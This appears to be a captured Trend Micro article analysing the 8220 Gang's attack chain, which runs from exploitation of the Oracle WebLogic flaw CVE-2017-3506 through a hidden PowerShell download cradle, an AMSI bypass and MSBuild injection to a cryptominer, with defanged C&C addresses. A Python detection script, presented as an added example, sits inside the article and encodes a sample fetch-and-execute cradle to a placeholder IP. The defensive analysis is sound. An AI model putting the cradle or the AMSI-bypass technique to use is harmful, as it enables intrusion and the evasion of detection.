www.trendmicro.com
URL:
https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html
Submission: On May 17 via api from TR — Scanned from DE
Exploits & Vulnerabilities

8220 Gang Evolves With New Strategies

We observed the threat actor group known as “8220 Gang” employing new strategies for their respective campaigns, including exploits for the Linux utility “lwp-download” and CVE-2017-3506, an Oracle WebLogic vulnerability.

By: Sunil Bharti
May 16, 2023
Read time: 4 min (1209 words)

8220 Gang (also known as “8220 Mining Group,” a name derived from the group's use of port 8220 for command-and-control (C&C) communications) has been active since 2017 and continues to scan for vulnerable applications in cloud and container environments. Researchers have documented the group targeting Oracle WebLogic, Apache Log4j, and Atlassian Confluence vulnerabilities, as well as misconfigured Docker containers, to deploy cryptocurrency miners on both Linux and Microsoft Windows hosts. The group has been documented using Tsunami malware, the XMRig cryptominer, masscan, and spirit, among other tools, in its campaigns. Other researchers' documentation of the gang's recent activities indicates that the threat actor has remained active in recent months.
This article explores a recent attack, captured by one of our honeypots, that exploited the Oracle WebLogic vulnerability CVE-2017-3506. This vulnerability, with a CVSS score of 7.4, affects the WLS Security component of Oracle WebLogic; when exploited, it lets a remote attacker execute arbitrary commands through an HTTP request carrying a specially crafted XML document. Attackers can thereby gain unauthorized access to sensitive data or compromise the entire system.

Entry point

Figure 1. Exploiting CVE-2017-3506

Attackers used the HTTP URI (Uniform Resource Identifier) "wls-wsat/CoordinatorPortType" as the entry point to target an Oracle WebLogic server via CVE-2017-3506.

Figure 2. POST request to the vulnerable resource

On entry, 8220 Gang delivered a PowerShell script that downloads and creates other dropper files, using the six-year-old vulnerability. In recent attacks, we also observed the group using “lwp-download,” a Linux utility that downloads the file specified by a URL. In this entry, we observed this utility also being used against Windows systems.

Figure 3. Use of the lwp-download utility

Infection routine

The attack payload executes a Base64-encoded PowerShell command. Upon decoding, it runs PowerShell in a hidden, non-interactive window (-NonI -W Hidden), with no profile loaded (-NoP), and with the execution policy bypassed (-Exec Bypass). The decoded command downloads and executes a PowerShell script, “bypass.ps1,” from http[:]//185[.]17[.]0[.]199/bypass.ps1 without displaying any visible output to the user.

Figure 4. Attack payload

Figure 5. URL after Base64 decoding

Analysis of bypass.ps1

Figure 6. Process flow of bypass.ps1

The PowerShell script decodes multiple Base64-encoded byte arrays to build another obfuscated PowerShell script in memory and executes it with the “iex” (Invoke-Expression) cmdlet.

Figure 7. Contents of the bypass.ps1 PowerShell script

All the variables assigned to byte arrays hold Base64-encoded strings (in this case, the $c byte array), which are used later in the script for deobfuscation. Once the $cc variable has been computed, it holds the decoded value of the $c byte array: the PowerShell script that is executed in memory without ever being written to disk. Decoding $c as ASCII yields the contents of $cc, which the script then executes.

The new PowerShell script performs the following tasks:

1. It disables AMSI detection. The code sets the “amsiInitFailed” field of the System.Management.Automation.AmsiUtils class to “True,” so that AMSI is effectively unhooked and no scanning is performed for the current process. To update the “amsiInitFailed” field, it uses .NET reflection to assign the value “True,” as seen in the bypass command.

Figure 8. AMSI detection bypass

2. After disabling AMSI detection, it defines the path under the Windows “temp” directory where the malicious binary will be written.

Figure 9. Malicious binary path

3. Next, it writes the binary file to the path specified in the “$eXE_PaTh” variable. This section of code decodes a Base64 string into a byte array (the binary's contents) and uses the .NET System.IO class to write the binary to disk.

Figure 10. Binary file written to disk

4. At the end of the script, PowerShell executes the newly written binary in the Windows “temp” directory using the “-WindowStyle Hidden” parameter, so that no user interface is displayed.

Figure 11. Binary execution

The file "Winscp-setup-1867.exe" is responsible for downloading the file "Ebvjmba.dat" by continuously sending GET requests to its server, http[:]//79[.]137[.]203[.]156/Ebvjmba.dat.
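As an added defender-side example (not code from the article or from Trend Micro), the following Python routine decodes a PowerShell -EncodedCommand argument the way PowerShell does (Base64 over UTF-16LE) and flags the traits the bypass.ps1 chain above exhibits: hidden window, -NoP, -Exec Bypass, a .ps1 download cradle, AmsiUtils/amsiInitFailed reflection strings, iex, and launching an executable from the temp directory. The sample command lines, the documentation IP 198.51.100.7 and the placeholder AMSI fragment are constructed for this example and contain no working bypass.

```python
import base64
import re
from typing import Optional

# Regexes for the traits of the bypass.ps1 chain described above. Each hit is
# reported by name so an analyst can see why a command line was flagged.
INDICATORS = {
    "hidden_window": re.compile(r"-(?:W|WindowStyle)\s+Hidden\b", re.I),
    "no_profile": re.compile(r"-NoP(?:rofile)?\b", re.I),
    "exec_bypass": re.compile(r"-Exec(?:utionPolicy)?\s+Bypass\b", re.I),
    "ps1_download": re.compile(r"https?://\S+?\.ps1\b", re.I),
    "amsi_reflection": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "temp_exe_launch": re.compile(r"\\temp\\\S+?\.exe\b", re.I),
}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind a PowerShell -EncodedCommand argument, or None.
    PowerShell expects Base64 over UTF-16LE text, so a plain ASCII decode of such
    a blob shows interleaved NUL bytes; decoding as UTF-16LE recovers the script."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_powershell(cmdline: str) -> dict:
    """Decode any encoded payload, then list the indicators that fire on the visible
    and decoded text together. One hit alone (e.g. -NoProfile) is normal admin
    usage, so 'suspicious' requires at least two co-occurring traits."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"decoded": decoded, "hits": hits, "suspicious": len(hits) >= 2}


def encode_command(plaintext: str) -> str:
    """Build an -EncodedCommand blob the way PowerShell expects (UTF-16LE Base64);
    used here only to construct the sample event below."""
    return base64.b64encode(plaintext.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation command lines (not from the article).
# STAGE1 mirrors the hidden, profile-less, policy-bypassing download cradle;
# STAGE2 mirrors the in-memory script. The IP is a documentation address and the
# AMSI fragment is a placeholder string carrying only the class/field names.
STAGE1 = "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -enc " + encode_command(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/bypass.ps1')")
STAGE2 = ('powershell.exe -NoP -W Hidden -c "[constructed placeholder: reflection on '
          'System.Management.Automation.AmsiUtils.amsiInitFailed]; '
          'Start-Process C:\\Windows\\Temp\\Winscp-setup-1867.exe -WindowStyle Hidden"')
BENIGN = "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"

if __name__ == "__main__":
    for line in (STAGE1, STAGE2, BENIGN):
        result = triage_powershell(line)
        print(result["suspicious"], result["hits"])
```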
After Winscp-setup-1867.exe runs, a DLL contacts the file server at 79[.]137[.]203[.]156, an IP address we determined to be the C&C server, to download the DAT file dropper. The DLL uses the .NET Framework's “HttpClient” class to send an HTTP GET request to the specified asset URL.

Figure 12. Function that downloads the DAT file, shown as .NET code from the disassembler

Figure 13. Network traffic capture of the file download

This dropper contains only a Base64-encoded string of the binary, stored in reverse to evade detection.

Figure 14. Binary in reverse (top) and when decoded (bottom)

Figure 15. Function reversing the byte array to form the correct binary

The newly created .dll file is an encrypted resource file that is injected into the MSBuild process. The file is meticulously obfuscated, adding an extra layer of complexity for analysts. After inspecting the process's memory, we found that the injected payload's configuration is Base64-encoded and that the new process communicates with one of three C&C servers over TCP port 9090, 9091, or 9092 to download a cryptocurrency miner:

* 179[.]43[.]155[.]202
* work[.]letmaker[.]top
* su-94[.]letmaker[.]top

Figure 16. Process injection into msbuild.exe. Screenshot taken with Trend Vision One™

Conclusion

lwp-download is a Linux utility present by default on a number of platforms, and 8220 Gang making it part of any malware routine can affect a number of services, even if the technique is reused more than once. Given the threat actor's tendency to reuse tools across campaigns and to abuse legitimate tools as part of its arsenal, security teams may be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility. Abuse of lwp-download can be expected in the short term for compromising and targeting other platforms.
Despite reusing old tools and C&C servers, the gang has started targeting Windows systems and using new file and C&C servers to evade earlier detections. Moreover, while it may seem counterintuitive to use a six-year-old security gap in an attack, the malicious actor's scanning activity could have shown that systems remain vulnerable to the exploit. Considering these developments, we regard 8220 Gang as a threat to be reckoned with, despite other researchers describing them as “low-level script kiddies,” and organizations still have work to do in keeping their security systems up to date. In the group's previous deployments, the scripts it used were simple, unable to evade detection, and easy to analyze. Over time, it has included significantly damaging pieces of malware (such as Tsunami malware) in its campaigns. We will continue monitoring this group and its deployments for analysis, detection, and blocking.

Trend Micro solutions

Trend Cloud One™ - Endpoint Security and Workload Security protect endpoints, servers, and cloud workloads through unified visibility, management, and role-based access control. These services provide specialized security optimized for your diverse endpoint and cloud environments, eliminating the cost and complexity of multiple point solutions.

Indicators of Compromise (IOCs)

URLs and IPs